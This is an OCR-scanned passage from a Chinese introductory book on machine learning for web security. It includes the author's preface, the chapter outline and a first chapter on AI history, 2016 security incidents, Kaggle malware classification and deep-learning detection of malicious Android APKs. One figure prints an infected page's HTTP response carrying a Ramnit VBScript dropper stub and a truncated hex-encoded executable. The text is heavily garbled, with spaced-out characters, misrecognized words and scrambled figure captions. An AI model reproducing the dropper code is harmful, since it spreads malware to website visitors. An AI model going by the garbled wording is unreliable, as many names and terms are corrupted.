伙 ， 其 技术 的 发 展 已 经 远 远 超 乎 我 们 的 想象 。 如 何 借 助人 工 智 能 的 力量 ， 提 升 安全 行业 的 整体 检测 与 防护 能 力 ， 成 为 各 大 安全 厂商 研究 的 课题 。 在 国内 安全 行业 ，BAT 以 及 大 量 新 兴 的 创业 公司 先后 进入 企 
业 安 全 领域 ,他 们 凭借 着 自身 数据 搜集 、 处 理 、 积 累 以 及 人 工 智 能 方面 的 优势 ， 正 在 逐渐 改变 着 整个 安全 行业 。 安 全 产品 的 形态 也 从 硬件 盒子 逐步 走向 混合 模式 以 及 云端 SaaS 服 务 ， 安 全 技术 从 重 防御 逐步 
走向 数据 分 析 以 及 智能 了 驱动。 传统 安全 厂商 也 凭借 其 强大 的 安全 人 才 储 备 ， 迅 速 推进 人 工 智 能 在 安全 产品 的 落地 。 


我 在 网 络 安全 这 个 行业 搬 了 好 几 年 砖 ， 前 五 年 做 大 型 互联 网 公司 的 企业 安全 建设 ， 从 准 入 系统 到 WAF、SIEM、IPS 等 ， 基 本 都 开发 或 者 使 用 过 ， 最 近 三 年 一 直 负 责 云 安全 产品 ， 从 抗 D、WAF 产 品 到 、 
SIEM、 入 侵 检 测 等 ， 使 用 的 技术 从 规则 、 黑 白 名 单 、 模 型 、 沙 箱 再 到 机 器 学 习 ， 从 单机 的 OSSIM 到 Hadoopb、Storm、Spatk、EILK， 也 算 目睹 了 安全 技术 或 者 更 准确 地 说 是 数据 分 析 处 理 技术 的 迅猛 发 展 。 我 
深 深 感到 ， 使 用 人 工 智能 技术 改变 这 个 行业 不 是 我 们 的 选择 ， 而 是 必 经 之 路 。 我 在 真正 意义 上 接触 机 器 学 习 是 2014 年 年 底 ， 当 时 带领 了 一 个 很 小 的 团队 尝试 使 用 机 器 学 习 算 法 解决 安全 问题 ， 夸 夸 绊 绊 一 直 
走 到 现在 ， 变 成 几 十 人 的 一 个 产品 团队 。 


本 书 是 我 机 器 学 习 三 部 曲 的 第 一 部 ， 主 要 以 机 器 学 习 常见 算法 为 主线 ， 以 生活 中 的 例子 和 具体 安全 场景 介绍 机 器 学 习 常见 算法 ， 定 位 为 机 器 学 习 入 门 书籍 ， 便 于 大 家 可 以 快速 上 手 。 全 部 代码 都 能 在 普 
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深度 学 习 ， 并 以 具体 的 十 个 案例 介绍 机 器 学 习 的 应 用 ， 主 要 面向 具有 一 定 机 器 学 习 基 础 或 致力 于 使 用 机 器 学 习 解 决 工作 中 问题 的 读者 ， 全 书 的 重点 集中 在 问题 的 解决 而 不 是 
不 


第 
算法 的 介绍 。 由 于 深度 学 习 通 常 计算 量 已 经 超过 了 PC 的 能 力 ， 部 分 代码 需要 在 服务 器 甚至 GPU 上 运行 ， 不 过 这 不 影响 大 家 的 阅读 与 学 习 。 第 三 部 将 重点 介绍 强化 学 习 和 对 抗 网 络 ， 并 以 若干 虚构 安全 产品 或 


者 项 目 介 绍 如 何 让 机 器 真正 具备 AlphaGo 级 别 的 智能 。 


本 书 的 第 1 章 概括 介绍 了 机 器 学 习 的 发 展 以 及 互联 网 目前 的 安全 形势 。 第 2 章 介绍 了 如 何 打 造 自 己 的 机 器 学 习 工 具 箱 。 第 3 章 概括 介绍 机 器 学 习 的 基本 概念 。 第 4 章 介绍 Web 安 全 的 基础 知识 。 第 5 章 到 第 13 
章 介 绍 浅 层 机 器 学 习 算 法 ， 包 括 常见 的 KK 近邻 、 决 策 树 、 朴 素 贝 叶 斯 、 远 辑 回 归 、 支 持 向 量 机 、K_Means、FP-growth、Aprion、 隐 式 马 尔 可 夫 、 有 向 图 。 第 14 章 到 第 17 章 介绍 神经 网 络 以 及 深度 学 习 中 常用 的 
递归 神经 网 络 和 卷 积 神经 网 络 。 每 章 都 会 以 生活 中 的 例子 开头 ， 让 读者 有 一 个 感性 的 认识 ， 然 后 简短 介绍 基础 知识 ， 最 后 以 安全 领域 的 2~3 个 例子 讲解 如 何 使 用 该 算法 解决 问题 。 全 书 定位 是 能 让 更 多 的 安 
全 爱好 者 以 及 信息 安全 从 业者 了 解 机 器 学 习 ， 动 手 使 用 简单 的 机 器 学 习 算 法 解决 实际 问题 。 在 写作 中 尽量 避免 生硬 的 说 教 ， 能 用 文字 描述 的 尽量 不 用 冷冰冰 的 公式 ， 能 用 图 和 代码 说 明 的 尽量 不 用 多 余 的 文 


字 。 正 如 霍金 所 言 “ 多 写 1 个 公式 ， 少 一 半 读 者 ”， 项 望 反之 亦 然 。 


机 器 学 习 应 用 于 安全 领域 遇 到 的 最 大 问题 就 是 缺乏 大 量 的 黑 样 术 ， 即 所 谓 的 攻击 样本 ， 尤 其 相对 于 大 量 的 正常 业务 访问 ， 攻 击 行 为 尤其 是 成 功 的 攻击 行为 是 非常 少 的 ， 这 就 给 机 器 学 习 带 来 了 很 大 挑 
战 。 本 书 很 少 对 不 同 算法 进行 横向 比较 ， 也 是 因为 确实 在 不 同 场景 下 不 同 算法 表现 差别 很 大 ， 很 难说 深度 学 习 就 一 定 比 朴素 贝 叶 斯 好 ， 也 很 难说 支持 向 量 机 就 比 不 过 卷 积 神经 网 络 ， 拿 某 个 有 具体 场景 进行 横 
向 比较 意义 不 大 ， 毕 竟 选 择 算 法 不 像 购 买 SUV， 可 以 拿 几 十 个 参数 评 头 论 足 ， 最 后 还 是 需要 大 家 结合 实际 问题 去 选择 。 


这 里 我 要 感谢 我 的 家 人 对 我 的 支持 ， 本 来 工作 就 很 忙 ， 没 有 太 多 时 间 处 理 家 务 ， 写 书 以 后 更 是 花费 了 我 大 量 的 休息 时 间 ， 我 的 妻子 无 条 件 承担 起 了 全 部 家 务 ， 尤 其 是 照料 孩子 等 繁杂 事务 。 我 很 感谢 我 
的 女儿 ， 写 书 这 段 时 间 几 乎 没有 时 间 陪 她 玩 ， 她 也 很 懂事 地 自己 玩 ， 我 想 用 这 本 书 作 为 她 的 生日 礼物 送 给 她 。 我 还 要 感谢 吴 怡 编辑 对 我 的 支持 和 鼓励 ， 让 我 可 以 坚持 把 这 本 书写 完 。 最 后 还 要 感谢 各 位 业内 
好 友 尤 其 是 我 boss 对 我 的 支持 ， 排 名 不 分 先后 : 马 杰 @ 百 度 安全 、 汉 景 辉 @ 百 度 安全 、 林 了 晓 东 @ 百 度 基础 架构 、 黄 疾 @ 百 度 IT、 李 振 字 @ 百 度 AI[、Lenx(@ 百 度 安 全 、 黄 正 @ 百 度 安全 、 程 岩 @ 百 度 云 、 郝 轶 @ 
百度 云 、 云 鹏 @ 百 度 无 人 车 、 赵 林 林 @ 微 步 在 线 、 张 宇平 @ 数 盟 、 谢 忱 @Freebuf、 李 新 @Freebuf、 李 琦 @ 清 华 、 徐 恪 @ 清 华 、 王 字 @ 蚂 蚁 金 服 、 王 开 然 @ 蚂 蚁 金 服 、 王 龙 @ 蚂 蚁 金 服 、 周 涛 @ 启 明星 情 、 姚 志 
武 @ 借 贷 宝 、 刘 静 @ 安 天 、 刘 衣 君 @ 医 渡 云 、 记 威 @ 易 宝 支 付 、 尹 裔 (@sobug、 宋 文 宽 @ 联 想 、 团 长 @ 宜 人 贷 、 齐 和 鲁 @ 搜 狐 安全 、 吴 圣 @58 安 全 、 康 宇 @ 新 浪 安全 、 幻 泉 @i 春 秋 、 雅 驰 @i 春 秋 、 王 庆 双 @i 春 
秋 、 张 亚 同 @i 春 秋 、 王 禾 @ 微 软 、 李 至 (@paloalto、 西 瓜 @ 四 叶 草 、 郑 伟 @ 四 叶 草 、 朱 利 军 @ 四 叶 草 、 土 夫子 @XSRC、 英 雄蕊 @ 乐 视 云 、sbilly@360、 修 曼 @360、 高 舌 @ 滴 滴 、 高 舌 @ 爱 加 密 、 高 渐 离 @ 华 
为 、 刘 洪 善 @ 华 为 云 、 宋 柏林 @@ 一 亩 田 、 张 昊 @@ 一 亩 田 、 张 开 @ 安 恒 、 李 硕 @ 智 联 、 阿 杜 @ 优 信 拍 、 李 试 @ 房 多 多 、 李 程 @ 搜 狗 、Tony@ 京 东安 全 、 简 单 @ 京 东安 全 、 姚 聪 @face+、 李 鸣 雷 @ 金 山 云 ， 最 后 我 
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本 书面 向 信息 安全 从 业 人 员 、 高 等 院 校 计算 机 相关 专业 学 生 以 及 信息 安全 爱好 者 ， 机 器 学 习 爱 好 者 ， 对 于 想 了 解 人 工 智 能 的 CTO、 运 维 总 监 、 架 构 师 同样 也 是 一 本 不 错 的 科普 书籍 。 当 读者 在 工作 学 习 
中 遇 到 问题 时 可 以 想起 本 书 中 提 到 的 一 两 种 算法 ， 那 么 我 觉得 就 达到 效果 了 ， 如 果 可 以 让 读者 像 使 用 printf 一 样 使 用 VM、 朴 素 贝 叶 斯 等 算法 ， 那么 这 本 书 就 相当 成 功 了 。 


我 平时 在 FreeBuf 专 栏 以 及 i 春 秋分 享 企业 安全 建设 以 及 人 工 智能 相关 经 验 与 最 新 话题 ， 同 时 也 运营 我 的 微 信 公众 号 “ 兜 哥 带 你 学 安全 ”， 欢 迎 大 家 关注 并 在 线 交流 。 


本 书 使 用 的 代码 和 数据 均 在 GitHub 上 发 布 ， 地 址 为 : https://github.com/duoergun0729/1book, 代码 层 面 任何 疑问 可 以 在 GitHub 上 直接 反馈 。 


第 1 章 ，” 通 向 智能 安全 的 旅程 


人 工 智能 可 以 说 是 目前 最 热 的 一 个 话题 ， 从 较 早 前 的 谷歌 大 脑 到 近期 的 百度 无 人 车 、 谷 歌 AlphaGo 大 师 ， 一 个 个 人 工 智 能 的 新 应 用 都 在 不 断 剧 新 人 们 对 机 器 能 力 的 认 知 。 人 们 开始 关注 究竟 下 一 个 被 机 器 
取代 的 功能 会 是 什么 ， 甚 至 下 一 个 被 机 器 取代 的 职业 会 是 什么 呢 ? 


网 络 安全 也 是 国内 外 非常 热门 的 一 个 话题 ， 从 大 量 的 大 型 网 站 密码 泄露 到 大 半 个 美国 网 络 竣 羔 ， 再 到 直接 影响 美国 总 统 大 选 的 结果 ， 一 个 个 安全 事件 让 大 家 意识 到 安全 的 重要 性 ， 网 络 安全 已 经 是 国家 


安全 战略 层面 的 问题 了 。 人 工 智 能 在 网 络 安全 领域 是 否 也 可 以 创造 奇迹 呢 ? 现状 又 是 怎样 呢 ? 


本 章 将 介绍 人 工 智能 、 机 器 学 


Wal 


与 深度 学 习 的 区 别 与 联系 ， 介 绍 人 工 智能 的 发 展 。 近 期 国内 外 的 网 络 安全 形势 ， 以 及 人 工 智 能 在 网 络 安全 领域 的 应 用 。 


1.1 人 工 智 能 、 机 器 学 习 与 深度 学 习 


如 今 ， 人 工 智能 、 机 器 学 习 与 深度 学 习 几 乎 成 了 家 喻 户 晓 的 名 词 ， 究 竟 这 三 者 之 间 有 什么 联系 和 区 别 呢 ? 


通常 认为 ， 机 器 学 习 是 实现 人 工 智 能 的 主要 方式 ， 人 类 基于 机 器 学 习 以 及 海量 的 数据 ， 逐 步 实现 人 工 智能 ， 其 中 深度 学 习 是 机 器 学 习 的 一 个 分 支 。 如 果 用 同心 圆 来 表示 三 者 的 学 围 ， 那 么 人 工 智能 是 最 
外 面 的 一 个 圆 ， 深 度 学 习 是 最 里 面 的 圆 。 人 可 以 在 1 秒 以 内 做 出 的 判断 ， 都 可 以 用 机 器 来 实现 ， 而 且 机 器 可 以 同时 完成 成 百 上 干 人 1 秒 内 可 以 做 出 的 判断 ， 这 就 是 人 工 智 能 。 


1.2. 人工 智能 的 友 展 


1 谷歌 大 及 


谷歌 大 脑 是 “Google X 实 验 室 ”一 个 主要 研究 项 目 ， 是 谷歌 在 人 工 智能 领域 开发 出 的 一 款 模拟 人 脑 的 软件 ， 这 个 软件 具备 自我 学 习 功 能 。Google X 部 门 的 科学 家 们 通过 将 1.6 万 台电 脑 的 处 理 器 相连 接 
建造 出 了 全 球 为 数 不 多 的 最 大 中 枢 网 络 系统 ， 它 能 自主 学 习 ， 所 以 称 之 为 “谷歌 大 脑 ”。2012 年 ， 谷 歌 的 工程 师 曾 经 公布 了 一 个 令 人 激动 的 研究 结果 ， 他 们 使 用 了 1000 人 台 计 算 机 、16000 个 处 理 器 10 天 昼夜 
不 停 地 运转 ， 通 过 模拟 大 脑 细胞 ， 在 Youtube 的 视频 中 捕获 了 1000 万 张 图 片 学 习 识别 猫 、 人 以 及 其 他 事物 。 


2. 百 度 无 人 车 


百度 无 人 驾驶 车 项 目 于 2013 年 起 步 ， 由 百度 研究 院 主导 研发 ， 其 技术 核心 是 “百度 汽车 大 脑 ”， 包 括 高 精度 地 图 、 定 位 、 感 知 、 智 能 决策 与 控制 4 大 模块 。 其 中 ， 百 度 自主 采集 和 制作 的 高 精度 地 图 记 
录 完 整 的 三 维 道路 信息 ， 能 在 厘米 级 精度 实现 车 辆 定位 。 同 时 ， 百 度 无 人 驾驶 车 依托 国际 领先 的 交通 场景 物体 识别 技术 和 环境 感知 技术 ， 实 现 高 精度 车 辆 探测 识别 、 跟 踪 、 距 离 和 速度 估计 、 路 面 分 割 、 车 
道 线 检测 ， 为 自动 驾驶 的 智能 决策 提供 依据 。 


2015 年 12 月 ， 百 度 公司 宣 布 ， 百 度 无 人 驾驶 车 在 国内 首次 实现 城市 、 环 路 及 高 速 道路 混合 路 况 下 的 全 自动 驾驶 ， 如 图 1-1 所 示 。 百 度 公布 的 路 测 路 线 显 示 ， 百 度 无 人 驾驶 车 从 位 于 北京 中 关 村 软件 园 的 
百度 大 厦 附 近 出 友 ， 驶 入 G7 京 新 高 速 公路 ， 经 五 环 路 ,抵达 奥林匹克 森林 公园 ， 并 随后 按 原 路 线 返 回 。 百 度 无 人 驾驶 车 往返 全 程 均 实现 自动 驾驶 ， 并 实现 了 多 次 跟 车 减速 、 变 道 、 超 车 、 上 下 古道 、 调 头等 
复杂 驾驶 动作 ， 完 成 了 进入 高 速 到 驶 出 高 速 的 不 同道 路 场景 的 切换 。 测 试 时 最 高 速度 达到 100 干 米 /小 时 。 


Bai 百科 





图 1-1 百度 无 人 驾驶 车 
3.AlphaGo 
AlphaGo 是 一 款 围棋 人 工 智 能 程序 ， 由 谷歌 旗下 DeepMind 公 司 的 戴 密斯 - 哈 萨 比 斯 、 大 卫 : 席 尔 瓦 、 黄 士 杰 与 他 们 的 团队 开发 。 其 主要 工作 原理 是 “深度 学 习 ” 


2016 年 3 月 ， 该 程序 与 围棋 世界 冠军 、 职 业 九 段 选手 李 世 石 进行 人 机 大 战 (如 图 1-2 所 示 ) ， 并 以 4: 1 的 总 比分 获胜 ; 2016 年 未 至 2017 年 初 ， 该 程序 在 中 国 棋 类 网 站 上 以 “大 师 ” (Master) 为 注册 账 
号 与 中 日 韩 数 十 位 围棋 高 手 进 行 快 棋 对 决 ， 连 续 60 局 无 一 败绩 。 不 少 职 业 围棋 手 认 为 ，AlphaGo 的 棋 力 已 经 达到 甚至 超过 围棋 职业 九段 水 平 ， 在 世界 职业 围棋 排名 中 ， 其 等 级 分 曾经 超过 排名 人 类 第 一 的 棋 
手 柯 洁 。 
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图 1-2” 李 世 石 与 AlphaGo 进 行人 机 大 战 


就 在 AlphaGo 与 柯 洁 “ 人 机 大 战 ”不 久 前 ， 谷 歌 MO 2017 大 会 上 ， 谷 歌 “ 移 动 为 先 ” 向 “Al 优先 ”再 次 升级 ， 其 中 最 典型 的 表现 之 一 就 是 更 新 和 升级 了 去 年 MO 2017 大 会 上 公布 的 TPU (Tensor 
Processing Unit) 款 谷歌 自己 高 度 定制 化 的 Al (针对 Al 算法 ， 例 如 其 自己 开发 的 TensorFlow 深 度 学 习 架 构 ) 芯片 ， 也 是 AlphaGo 背 后 的 功臣 ， 即 AlphaGo 能 以 超人 的 熟练 度 下 围棋 都 要 靠 训练 神经 
网 络 来 完成 ， 而 这 又 需要 计算 能 力 (硬件 越 强 大 ， 得 到 的 结果 越 快 ) 。TPU 比 当前 的 GPU 或 CPU 平均 快 15 ~ 30 倍 ， 性 能 功 耗 比 (TOPS/Watt) 高 出 约 30 ~ 80 倍 。 此 外 ， 在 TPU 中 采用 GPU 常用 的 GDDR5 存 
储 器 能 使 性 能 TPOS 指 标 再 高 3 倍 ， 并 将 能 效 比 指标 TOPS/Watt 提 高 到 GPU 的 70 倍 ，CPU 的 200 倍 。 到 目前 为 止 ， 谷 歌 的 TPU 已 经 应 用 在 各 种 领域 的 应 用 中 ， 例 如 谷歌 图 像 搜索 (Google Image Search) 、 
AREH (Google Photo) 、 谷 歌 云 视觉 API| (Google Cloud Vision API) 、 谷 歌 翻 译 以 及 AlphaGo 的 围棋 系统 中 。 实 际 上 我 们 上 述 提 到 的 谷歌 MO 2017 大 会 推出 和 更 新 的 诸多 Al 产品 和 服务 背后 均 有 


TPU 的 硬件 支持 。 





2016 年 4 月 ，CNCERT 监 测 发 现 一 个 名 为 “Ramnit” 的 网 页 恶意 代码 被 挂 载 在 境内 近 600 个 党 政 机 关 、 企 事业 单位 网 站 上 (如 图 1-3 所 示 ) ， 一 旦 用 户 访问 网 站 就 有 可 能 受到 挂 马 攻击 ， 对 网 站 访问 用 户 
的 PC 主机 构成 安全 威 肋 。Ramnit 恶 意 代码 是 一 个 典型 的 VBScript 蠕 虫 病毒 ， 可 通过 网 页 挂 马 的 方式 进行 传播 ， 当 用 户 浏览 含有 Ramnit 恶 意 代 码 的 HTML 页 面 时 ， 点 击 加 载 ActiveX 控 件 ， 用 户主 机 就 很 有 可 


能 受到 恶意 代码 的 感染 。 


HTTP/1.1 200 OK 

Server: nginx/1.4.7 

Date: Thu, 28 Jan 2016 23:18:09 GMT 
Content-Type: text/html;charset-utf-8 
Transfer-Encoding: chunked 

Connection: keep-alive 

Set-Cookie: 

Expires: Thu, 28 Jan 2016 23:29:15 GMT 


3f0a 

«html» 

«head» 

«META HTTP-EQUIV-"cache-control" CONTENT="no-cache, must-revalidate"> 
«META HTTP-EQUIV-"Expires" CONTENT="-1"> 


«META HTTP-EQUIV-"pragma" CONTENT="no-nache"><META HTTP-EQUIV-"REFRESH" CONTENT="0; 
URL-html/2016-01/27/ .htm"»«/head» 

<body></body> 

«/html»«!--mpproperty <founder-papername> </ founder - papername><founder - type>3</ 
founder - type><founder - paperhead></ founder - paperhead><founder-content> </Tounder- 
content» /mpproperty--><SCRIPT Language=VBScript><'! - - 

DropFileName = “svchost. exe" = i 

eks pianga malicious VBScript 
"4D5A90000300000004000000FFFF0000880000000000000040000000000000000000000000000000000000000000000000 
0000000000000000000000000 10000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 





图 1-3 ”国内 部 分 网 站 存在 Ramnit 恶 意 代 码 攻 击 


2016 年 5 月 ， 俄 罗斯 黑客 成 功 地 进行 了 一 场 大 规模 的 数据 泄露 攻击 。 在 此 次 网 络 攻击 中 ， 黑 客 盗 取 了 2.723 亿 个 账号 ， 以 俄罗斯 最 受 欢 迎 的 电子 邮件 服务 Mail.ru 用 户 为 主 ， 此 外 还 有 Gmail 地 址 、 雅 虎 以 
及 微软 电邮 Hotmail 用 户 ， 如 图 1-4 所 示 。 路 透 社 称 ， 数 以 亿 计 的 数据 目前 正在 “俄罗斯 的 地 下 黑市 ”出 售 。 


©0710 

1 Oi 
| 0 T O 
57million of Mail.ru 


33million of Hotmail 


40 million of Yahoo 
24 million of Gmail addresses 
stolen 





图 1-4 ”2.7 亿 Gmail、 雅 虎 和 Hotmail 账 号 遭 泄 露 


2016 年 10 月 ， 提 供 动态 DNS 服 务 的 DynDNS 遭 天 了 大 规模 DDoS 攻 击 ， 攻 击 主要 影响 其 位 于 美国 东区 的 服务 。 此 次 攻击 导致 许多 使 用 DynDNS 服 务 的 网 站 遭遇 访问 问题 ， 其 中 包括 GitHub、Twitter、 
Airbnb、Reddit、Freshbooks、Heroku、SoundCloud、Spotify 和 Shopify。 攻 击 导致 这 些 网 站 一 度 瘫痪 ，Twitter 甚 至 出 现 了 近 24 小 时 无 访问 的 局 面 。 


2016 年 11 月 ， 希 拉 里 因 “ 邮 件 门 ”最 终 落 败 美国 总 统 竞 选 。 希 拉 里 在 担任 国务 卿 期 间 ， 从 未 使 用 域名 为 “@state.gov” 的 政府 电子 邮箱 ， 而 是 使 用 域名 为 “@clintonemail.com” 的 私人 电子 邮箱 和 
位 于 家 中 的 私人 服务 器 收发 公务 邮件 ， 涉 嫌 违 反 美国 《联邦 档案 法 》 关 于 保存 官方 通信 记录 的 规定 。 希 拉 里 被 美国 联邦 调查 局 (FBI) 调查 ， 民 众 支 持 率 节 节 下 降 ， 见 图 1-5。 


—— 
JONATHAN ALLEN & s uic 





图 1-5 项 拉 里 邮件 门 事 件 


1.4 人工 智能 在 安全 领域 的 应 用 


人 工 智能 在 安全 领域 的 应 用 还 属于 起 步 阶段 ， 各 大 安全 公司 以 及 互联 网 巨头 都 投入 大 量 的 人 力 物力 ， 试 图 使 用 人 工 智能 的 技术 来 颠覆 安全 这 个 行业 ， 目 前 在 黄 反 鉴 定 、 恶 意 链 接 、 业 务 风 控 领域 、 病 毒 
分 析 、APT 检 测 方面 都 取得 了 不 错 的 进展 ， 典 型 案例 的 就 是 2015 年 的 一 次 数据 挖掘 比赛 。 


2015 年 ， 微 软 在 Kaggle 上 发 起 了 一 个 恶意 代码 分 类 的 比赛 ， 并 提供 了 超过 500G 的 原始 数据 。 有 意思 的 是 ， 取 得 第 一 名 的 队伍 三 个 人 都 不 是 搞 安全 出 身 的 ， 所 采用 的 方法 与 我 们 常见 的 方法 存在 很 大 不 
同 ， 展 现 了 机 器 学 习 在 安全 领域 的 巨大 潜力 。 早 期 的 反 病 毒 软 件 大 都 单一 的 采用 特征 匹配 的 方法 ， 简 单 的 利用 特征 串 完 成 检测 。 随 着 恶意 代码 技术 的 发 展 ， 恶 意 代 码 开始 在 传播 过 程 中 进行 变形 以 衙 避 查 
杀 ， 此 时 同一 个 恶意 代码 的 变种 数量 急剧 提升 ， 形 态 较 本 体 也 发 生 了 较 大 的 变化 ， 反 病毒 软件 已 经 很 难 提 取出 一 段 代 码 作 为 恶意 代码 的 特征 码 。Kaggle 比 赛 中 最 重要 的 环节 就 是 特征 工程 ， 特 征 的 好 坏 直接 
决定 了 比赛 成 绩 。 在 这 次 Kaggle 的 比赛 中 冠军 队伍 选取 了 三 个 “黄金 ”特征 : 恶意 代码 图 像 、OpCode n-gram 和 Headers 个 数 ， 其 他 一 些 特征 包括 ByteCode n-gram， 指 令 频 数 等 。 机 器 学 习 部 分 采用 了 
随机 森林 算法 ， 并 用 到 了 xgboost 和 pypy 加 快 训 练 速度 ， 最 终 他 们 检测 的 效果 超过 了 常见 传统 检测 方式 ， 取 得 了 冠军 


1. 恶 意 代码 图 像 


这 个 概念 最 早 是 2011 年 由 加 利 福 尼 亚 大 学 的 Nataraj 和 Karthikeyan 在 他 们 的 论文 Malware Images: Visualization and Automatic Classification 中 提出 来 的 ， 思 路 非常 新 颖 ， 把 一 个 二 进 制 文件 以 灰 
度 图 的 形式 展现 出 来 ， 利 用 图 像 中 的 纹理 特征 对 恶意 代码 进行 聚 类 。 此 后 ， 有 许多 研究 人 员 在 这 个 思路 基础 上 进行 了 改进 和 探索 。 就 目前 发 表 的 文章 来 看 ， 恶 意 代 码 图 像 的 形式 并 不 固定， 研究 人 员 可 根据 
实际 情况 进行 调整 和 创新 。 


2.OpCode n-gram 


n-gram 是 自然 语言 处 理 领 域 的 概念 ， 早 期 的 语音 识别 技术 和 统计 语言 模型 与 它 密 不 可 分 。n-gram 基 于 一 个 简单 的 假设 ， 即 认为 一 个 词 出 现 的 概率 仪 与 它 之 前 的 n-1 个 词 有 关 ， 这 个 概率 可 从 大 量 语 料 
中 统计 得 到 。 例 如 “ 吃 ” 的 后 面 出 现 “ 苹 果 ” 或 “披萨 ”的 概率 就 会 比 “ 公 路 ”的 概率 大 (正常 的 语 料 中 基本 不 会 出 现 “ 吃 公路 ”这 种 组 合 ) ， 可 以 看 出 n-gram 在 一 定 程度 上 包含 了 部 分 语言 特征 。 


将 n-gram 应 用 于 恶意 代码 识别 的 想法 最 早 由 Tony 等 人 在 2004 年 的 论文 N-gram-based Detection of New Malicious Code 中 提出 ， 不 过 他 们 的 方法 是 基于 ByteCode 的 。2008 年 Moskovitch 等 人 的 
论文 Unknown Malcode Detection Using OPCODE Representation 中 提出 利用 OpCode 代 蔡 ByteCode 更 加 科学 ， 如 图 1-6 所 示 。 
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Disassembly 


push ebp 

nou ebp, esp 

and esp, UOFFFFFFF8h 
sub esp, 2BCh 

push ebx 


Extracting sequences 
of OpCodes 


OpCode 1-gram push (2) mov (1) and (1) sub (1) 


OpCode 2-gram push,mov (1) mov,and (1) and,sub (1) sub,push (1) 





OpCode3-gram push,mov,and (1) mov,and,sub (1)  and,subypush"() 


图 1-6 ”二进制 文件 的 OpCode n-gram 


在 移动 应 用 领域 ， 使 用 类 似 的 思路 也 取得 了 不 错 的 成 绩 ， 我 的 同事 王磊 使 用 深度 学 习 识 别 恶 意 APK， 准 确 率 达 到 99.96%， 召 回 率 达 到 了 80%，2016 年 ， 反 映 该 研究 成 果 的 论文 “Al Based Antivirus: 
Can Alphaav Win The Battle in Which Man Has Failed? ”被 享誉 国内 外 的 Blackhat 会 议 收录 并 做 了 相关 演讲 。 


恶意 APK 伴 随 移 动 互联 网 井喷 式 的 发 展 ， 其 数量 在 近 几 年 几何 级 别 增长 ， 如 图 1-7 所 示 。 传 统 的 基于 规则 的 检测 技术 已 经 无 法 覆盖 如 此 大 量 的 恶意 程序 。 


Sample increase VS signature efficiency decrease 


ON New samples per year -O- Total number of samples ew D owgin Samples O Average Hit Per S g 


Average Hit 


2013 2014 2015 


Number of Malicious Android Apps Dowgin: A Rich Variants Android Adware Family 
New Dowgin Samples VS Average Dowgin Samples Hit Per Signature 


Malicious apps, Dowgin samples and Dowgin signatures are counted from our database. 





图 1-7 恶意 APK 数 量 猛 增 


王磊 团队 在 大 量 的 人 工分 析 恶 意 APK 的 工作 中 发 现 ， 人 工分 析 的 过 程 很 类 似 图 像 识 别 的 过 程 。 深 度 学 习 人 在 图 像 识别 领域 有 着 成 熟 的 应 用 ， 是 否 可 以 通过 提取 APK 特 征 ， 通 过 深度 学 习 的 方法 来 自动 化 识 
别 恶 意 APK 呢 ? 如 图 1-8 所 示 。 
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Virus Analysis VS Image Recognition 
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Image Provided by the MNIST handwritten database 





Experienced virus analyst sometimes is doing image recognition! 
图 1-8 恶意 APK 分 析 与 图 像 识 别 
王磊 团队 对 APK 的 特征 提取 主要 分 为 三 大 类 特征 : 
C 结构 化 特征 ， 包 括 APK 申 请 的 权限 的 个 数 ， 资 源 文 件 中 包含 的 图 像 文 件 个 数 和 参数 大 于 20 的 函数 的 个 数 等 。 
“ 统计 类 特征 ， 包 括 近 千 条 统计 特征 。 
- 长 期 恶意 APK 检 测 的 经 验 总 结 的 特征 ， 包 括 资 源 文 件 中 是 否 包 含 可 执行 文件 ，assets 文 件 夹 中 是 否 包 含 APK 文 件 等 。 


特征 提取 过 程 如 图 1-9 所 示 。 


De 9 — 2/757 
N blackhat =unoPE 2015 "S. MS E. A: > 
he | Hmc A AAAA 


Feature extraction Numeralization(N = 1235) 


Structural features Continuous value 
*Num of uses-permissons in AndroidManifest 

*Number of picture files in /res (N z 571) 

*Size of /res 

*Number of classes starts with Lcom/ 

*Num of classes starts with Ljava/ 

*Num of fields type boolean 

*Num of methods which has parameters » 20 


Statistical features 
*Count certificate fields in samples to get 
100 strings with discriminative info. E.g. 
emailAddresszMGame (9 mobile.com 
malicious/benign = 52 


Empirical features 
*Has executable file in /res 

*Has apk file in /assets 

*Register DEVICE ADMIN ENABLED 
broadcast and has sendSMSMessage 
permission 





图 1-9 APK 特 征 提 取 过 程 


归 一 化 处 理 一 干 多 个 特征 ， 取 值 控 制 在 -1 和 1 之 间 ， 如 图 1-10 所 示 。 


严 


| " L 
NQ black hat = IROPE 20165 | WA : | y / S ! 
| WAFA, AR 


Featu re norm alization To make features more discriminative 


Precision increased by 996 
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Long-tailed distribution 





图 1-10” 归 一 化 APK 特 征 


使 用 深度 学 习 网 络 训练， 训练 过 程 如 图 1-11 所 示 。 
N blackhat =UPoPE 20E Me | 
- b 


Training in deep neural network 


Configurations: 
*Hidden layer activation function: Tanh 
and ReLU 
*Cost function: Multiclass cross entropy 
Hidden layer 1 *Learning method: ADADELTA 
*Final layer activation function: Softmax 
Passes: 20 ~ 30 


Input layer output layer 


Normalized 

Continuous Hidden layer 2 Hidden layer 3 Residual layer 
value identity 

(n=571) 


ver | 


AutoEncoder 


0-1 value 
(n=664) 


Network Architecture 


n=256 


Trained on PaddlePaddle platform with 15M+ samples 





图 1-11 APK 深 度 学 习 训 练 过 程 
整个 训练 过 程 中 使 用 超过 了 15 万 个 样本 ， 训 练 使 用 了 百度 开源 的 深度 学 习 框架 Paddle。 本 书 的 第 二 部 中 关于 深度 学 习 的 案例 也 主要 使 用 Paddle 和 TensorFlow 框 架 编 写 


Paddle 主 页 为 : http://www.paddlepaddle.org/ 


1.5 ”算法 和 数据 的 辨证 关系 


算法 和 数据 是 机 器 学 习 解 决 实际 问题 不 可 或 缺 的 两 大 因素 ， 缺 一 不 可 。 早 期 的 机 器 学 习 十 分 依赖 特征 的 提取 ， 提 取出 关键 的 特征 ， 往 往 可 以 事半功倍 。 深 度 学 习 的 快速 发 展 ， 人 们 发 现 通过 增加 训练 数 
气量， 让 机 器 从 大 量 基础 特征 中 可 以 自动 天 联 出 潜在 关系 ， 自 动 学 习 出 更 高 级 的 特征 ， 所 以 有 种 说 法 被 很 多 人 接受 ， 就 是 当 数 据 量 足 够 大 时 ， 不 同 的 算法 对 效果 的 影响 不 大 。 但 是 在 实际 工作 中 ， 很 难保 证 
